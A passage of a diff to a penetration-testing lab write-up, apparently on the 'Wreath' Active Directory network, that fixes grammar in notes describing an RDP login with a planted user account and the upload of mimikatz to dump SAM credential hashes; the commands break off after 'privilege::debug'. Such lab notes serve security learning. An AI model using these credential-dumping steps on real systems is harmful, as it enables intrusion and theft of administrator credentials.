thesinghsec/HackingNotes101/Machines/AD/Wreath.md

 Local Group Memberships      *Administrators       *Remote Management Use
                              *Users
 ```
-- Now I logged in using `xfreerdp` with the new added users credentials.
+- Now I logged in using `xfreerdp` with the newly added user credentials.
 ```bash
  xfreerdp /u:badboy /p:password123 /v:10.200.96.150 +clipboard /drive:/home/singhx/labs,share
 ```
-- By uploading the mimikatz, I dumped sam file and save the administrators hash for future use.
+- By uploading the mimikatz, I dumped the sam file and save the administrator's hash for future use.
 ```powershell
 mimikatz.exe
 privilege::debug